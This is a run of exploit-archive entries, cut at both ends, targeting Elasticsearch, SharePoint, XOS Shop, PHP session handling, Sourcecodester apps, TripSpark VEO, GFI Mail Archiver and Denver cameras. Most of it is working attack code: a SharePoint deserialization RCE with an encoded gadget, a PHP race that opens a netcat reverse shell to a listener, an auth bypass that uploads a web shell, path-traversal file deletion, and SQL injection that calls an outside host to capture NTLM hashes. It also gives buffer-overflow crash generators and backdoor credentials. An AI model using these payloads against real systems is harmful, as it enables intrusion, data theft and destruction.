version.parse(es_version) > version.parse("7.13.3"): print("# Elastic Service not vulnerable") print("# Elastic Service version: " + es_version) print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3") exit() #Prepare exploitation payload = "@\n" vulnerable_endpoint = "/_bulk" url = args.url + vulnerable_endpoint #Exploitation print("# ElasticSearch Version: " + es_version) print("# Request to " + url+"\n") r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False) #Read Memory Leak and remove stacktrace print("$$$$$$$$$$$$$$$$$$$$$$$$$") print("$$$$$ Memory Leaked $$$$$") print("$$$$$$$$$$$$$$$$$$$$$$$$$\n") response = json.loads(r.content) leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0] leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0] print(leak1+"\n"+leak2)

# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC) # Date: 25.07.2021 # Vendor Homepage:https://www.noteburner.com/ # Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe # Exploit Author: Achilles # Tested Version: 2.35 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Noteburner # 4.- Click More and Enter License Code # 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code' # 6.- Click 'OK' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC) # Date: 25.07.2021 # Vendor Homepage:https://www.leawo.org # Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html # Exploit Author: Achilles # Tested Version: 11.0.0.1 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Leawo Prof. Media # 4.- Click Activation Center # 5.- Paste the content of EVIL.txt into the Field: 'Keycode' # 6.- Click 'Register' and you will see a crash. #!/usr/bin/env python buffer =3D "\x41" * 6000 try: f = open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump # Date: 2021-07-21 # Exploit Author: Joan Martinez @magichk # Vendor Homepage: https://www.elastic.co/ # Software Link: https://www.elastic.co/ # Version: >= 7.10.0 to <= 7.13.3 # Tested on: Elastic ECE (Cloud) # CVE : CVE-2021-22146 # Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 import os import argparse import sys ######### Check Arguments def checkArgs(): parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(description='Elasticdump 1.0\n') parser.add_argument('-s', "--host", action="store", dest='host', help="Host to attack.") parser.add_argument('-p', "--port", action="store", dest='port', help="Elastic search port by default 9200 or 9201") parser.add_argument('-i', "--index", action="store", dest='index', help="Index to dump (Example: 30)") args = parser.parse_args() if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : parser.print_help(sys.stderr) sys.exit(1) return args def banner(): print(" _ _ _ _") print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __") print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ") print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") print(" |_|") def exploit(host,port,index): if (index != 0): final = int(index) else: final = 1000000000 cont = 0 while (cont <= final): os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s") cont = cont + 1 if __name__ == "__main__": banner() args = checkArgs() if (args.index): exploit(args.host,args.port,args.index) else: exploit(args.host,args.port,0)

# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2) # Google Dork: inurl:quicklinks.aspx # Date: 2020-08-14 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service # Pack 2, SharePoint Server 2019 # Tested on: Windows 2016 # CVE : CVE-2020-1147 # Credit goes to Steven Seele and Soroush Dalili # Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html #!/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth from urllib import quote, unquote import logging class Exploit(object): # To generate the gadget use: # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==' control_path_quicklinks = '/_layouts/15/quicklinks.aspx' control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' control_path = control_path_quicklinks def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (domain, username) self.target = target self.password = password self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.headers = {} self.query_params = { 'Mode': "Suggestion" } self.form_values = { '__viewstate': '', '__SUGGESTIONSCACHE__': '' } self.cookies = {} self.payload = """\ <DataSet> <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset"> <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="Exp_x0020_Table"> <xs:complexType> <xs:sequence> <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <somedataset> <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted"> <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType> </MethodParameters> <ObjectInstance xsi:type="LosFormatter"></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram> </DataSet>""".replace('{GADGET}', self.gadget) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def do_post(self, url, data=None, params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def parse_page(self, content): soup = BeautifulSoup(content, 'lxml') for key, val in self.form_values.iteritems(): try: for tag in soup.select('input[name=%s]' % key): try: self.form_values[key] = tag['value'] except Exception as error: stderr.write('error for key %s error %s\n' % (key, str(error))) except Exception as error: stderr.write('error for selector %s error %s\n' % (key, str(error))) return self def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def clean(self, payload): payload = payload.replace('\n', '').replace('\r', '') while ' ' in payload: payload = payload.replace(' ', ' ') return payload def get_form(self): url = '%s%s' % (self.target, self.control_path) resp = self.do_get(url=url, params=self.query_params) self.parse_page(content=resp.content) return resp def send_payload(self): url = '%s%s' % (self.target, self.control_path) # self.get_form() self.headers['Content-Type'] = 'application/x-www-form-urlencoded' self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload) self.form_values['__viewstate'] = '' resp = self.do_post(url=url, params=self.query_params, data=self.form_values) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit') try: parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ') parser.add_argument("-username", action='store', default='', help='Username to use: first.last') parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local') parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020') parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False') parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False') parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, username=options.username, domain=options.domain, password=options.password, target=options.target ) if options.debug: exp.debug() stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % ( options.target, options.username, options.domain, options.password, options.debug, options.proxy )) result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) if 'MicrosoftSharePointTeamServices' in result.headers: stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices']) if options.both and result.status_code != 200: exp.control_path = exp.control_path_quicklinksdialogform stdout.write('Trying alternate page\n') result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))

# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated) # Date: 2021-07-25 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://xos-shop.com # Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9 # Version: 1.0.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1 ################ # Description # ################ # XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Manufacturers > edit any manufacturer 3. Upload any image as "Manufacturers Image" and click save button 4. Then, tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image". # Assumed there is a backup.conf file in web root PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678 Content-Length: 1305 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[2]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[1]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[3]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[2]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[1]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[3]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="delete_manufacturer_image" true -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="current_manufacturer_image" ../../backup.conf -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_image"; filename="" Content-Type: application/octet-stream -----------------------------120849309142309531191692203678-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php Note: Multiple parameters affected Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Categories/Products > edit any category 3. Upload any image as "Category Image" if there is no existing image and click save button else, 4. Tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image". # Assumed there is a backup.conf file in web root PoC #2) param current_category_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599 Content-Length: 2524 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_id" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_category_image" ../../../backup.conf -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="category_name" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="delete_category_image" true -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_image"; filename="" Content-Type: application/octet-stream -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="product_list_b" 0 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="sort_order" 10 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[2]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[1]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[3]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[3]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[3]" -----------------------------95672159210084798032704634599-- --- # For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1 # The affected version is prior to v1.0.9.

# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection # Date: 26/7/2021 # Exploit Author: SiLvER | Faisal Alhadlaq # Tested on: PHP Version is 7.3.15-3 # This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat #!/usr/bin/python3 """ Usage : python3 poc.p <Target URL> <ListnerIP> <ListnerPORT> python3 poc.py https://xyz.xyz 192.168.1.15 1337 """ import requests import threading import datetime import sys x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) newDatetime = x + addSeconds def fuzz(): targetIP = sys.argv[1] listnerIP = sys.argv[2] listnerPORT = sys.argv[3] global newDatetime while True: try: if datetime.datetime.now() > newDatetime: exit() # proxies = { # "http": "http://127.0.0.1:8080", # "https": "https://127.0.0.1:8080", # } sessionName = "SiLvER" url = targetIP s = requests.Session() cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')} # You need to change the parameter in your case , here the vulnerabile parameter is (lfi) params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),) x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n") threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) < 4: print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) By SiLvER \n") exit() else: main()

# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) # Date: 27 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824 # Version: Denver SHC-150 (all firmware versions) # Tested on: Denver SHC-150 Backdoor was found in a Denver SHC-150 Smart Wifi Camera. Maybe other models also have this backdoor too. So, backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. Backdoor allows an attacker to execute commands on OS lever through telnet. PoC: ``` enty8080@Ivans-Air ~ % telnet 192.168.2.118 23 Trying 192.168.2.118... Connected to pc192-168-2-118. Escape character is '^]'. goke login: default $ ls / bin home linuxrc opt run tmp dev init media proc sbin usr etc lib mnt root sys var $ pwd /home/default $ exit Connection closed by foreign host. enty8080@Ivans-Air ~ % ```

# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE # Exploit Author: Javier Olmedo # Date: 27/07/2021 # Vendor: Sourcecodester # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip # Affected Version: 1.0 # Category: WebApps # Platform: PHP # Tested on: Ubuntu Server & Windows 10 Pro import os, re, sys, argparse, requests from termcolor import cprint def banner(): os.system("cls") print(''' ___________ __ \_ _____/__ __ ____ _____/ |_ | __)_\ \/ // __ \ / \ __\\ | \\\\ /\ ___/| | \ | /_______ / \_/ \___ >___| /__| \/ \/ \/ Registration System --[Authentication Bypass and RCE]-- @jjavierolmedo ''') def get_args(): parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy') args = parser.parse_args() return args def auth_bypass(s, proxies, url): data = { "username":"admin'#", "password":"" } r = s.post(url, data=data, proxies=proxies) if('{"status":"success"}' in r.text): cprint("[+] Authenticacion Bypass Success!\n", "green") return s else: cprint("[-] Authenticacion Bypass Error!\n", "red") sys.exit(0) def upload_shell(s, proxies, url): content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>" file = { 'img':('cmd.php',content) } data = { "name":"Event Registration System with QR Code - PHP", "short_name":"ERS-QR-PHP", } r = s.post(url, files=file, data=data, proxies=proxies) if('1' in r.text and r.status_code == 200): cprint("[+] Upload Shell Success!\n", "green") return s else: cprint("[-] Upload Shell Error!\n", "red") sys.exit(0) def get_shell_url(s, proxies, url): r = s.get(url, proxies=proxies) regex = '\_cmd.php"> (.*?)</a></li>' shell_name = re.findall(regex, r.text)[0] url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name) cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green") def main(): banner() args = get_args() target = args.target proxies = {'http':'','https':''} if args.proxy: proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)} login_url = target + "/event/classes/Login.php?f=rlogin" upload_url = target + "/event/classes/SystemSettings.php?f=update_settings" shell_url = target + "/event/uploads/" s = requests.Session() s = auth_bypass(s, proxies, login_url) s = upload_shell(s, proxies, upload_url) s = get_shell_url(s, proxies, shell_url) if __name__ == "__main__": try: main() except KeyboardInterrupt: cprint("[-] User aborted session\n", "red") sys.exit(0) # Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo

# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass # Date: 27/07/2021 # Exploit Author: Shafique_Wasta # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip # Version: 1 # Tested on: Windows 10/xampp # DESCRIPTION # # Customer relationship management system is vulnerable to Sql Injection Auth Bypass # Exploit Working: # 1. Visit on localhostcrm/customer/login.php # 2. You will see the login panel # 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account. # Vulnerable URL :http://localhost/crm/customer/login.php # Payload: '=' 'or'

# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection # Google Dork: inhtml:"Student Busing Information" # Date: 07/27/2021 # Exploit Author: Sedric Louissaint @L_Kn0w # Vendor Homepage: https://www.tripspark.com # Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf # Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084 # OS Tested on: Microsoft Windows Server 2012 R2 Standard # Vender Notified: 01/19/2021 # Confirmed Patch was released : 06/15/2021 # Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability. # PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound). ``` POST / HTTP/1.1 Host: vulnerable.site.net User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 4700 Origin: vulnerable.site.net Connection: close Referer: https:// vulnerable.site.net Cookie: ASP.NET_SessionId=x Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 __VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit ```

# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot # Date: 28 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826 # Version: Denver SHO-110 (all firmware versions) # Tested on: Denver SHO-110 Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too. So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication. It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream. PoC: http://<host>:8001/snapshot

# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated) # Date: 21/03/2021 # Exploit Author: Amin Bohio # Original Research & Code By: Paul Taylor / Foregenix Ltd # Original Exploit: https://github.com/bao7uo/RAU_crypto # Vendor Homepage: https://www.gfi.com # Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver # Vulnerable Versions: GFI Mail Archiver <= 15.1 # Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload # Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference # Tested on: Windows & Linux # Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver #!/usr/bin/python3 # Original Telerik Exploit Author: Paul Taylor / @bao7uo # https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py # Modified by: Amin Bohio import sys import base64 import json import re import requests import os from Crypto.Cipher import AES from Crypto.Hash import HMAC from Crypto.Hash import SHA256 from Crypto.Hash import SHA1 from struct import Struct from operator import xor from itertools import starmap import binascii from requests.packages.urllib3.exceptions import InsecureRequestWarning # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 1 of 2 # Warning, the below prevents certificate warnings, # and verify = False (CERT_VERIFY prevents them being verified requests.packages.urllib3.disable_warnings(InsecureRequestWarning) CERT_VERIFY = False # ****************************************** # ****************************************** class PBKDF: def sha1(v): hl = SHA1.new() hl.update(v) return hl.digest() def derive1(password, salt): hash = (password + salt).encode() for i in range(0, 99): hash = PBKDF.sha1(hash) result = PBKDF.sha1(hash) i = 1 while len(result) < 48: result += PBKDF.sha1(str(i).encode() + hash) i += 1 return result def hmacsha1(v): hl = PBKDF.mac.copy() hl.update(v) return bytearray(hl.digest()) def derive2(password, salt): # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py result_length = 48 PBKDF.mac = HMAC.new(bytes(password.encode()), None, 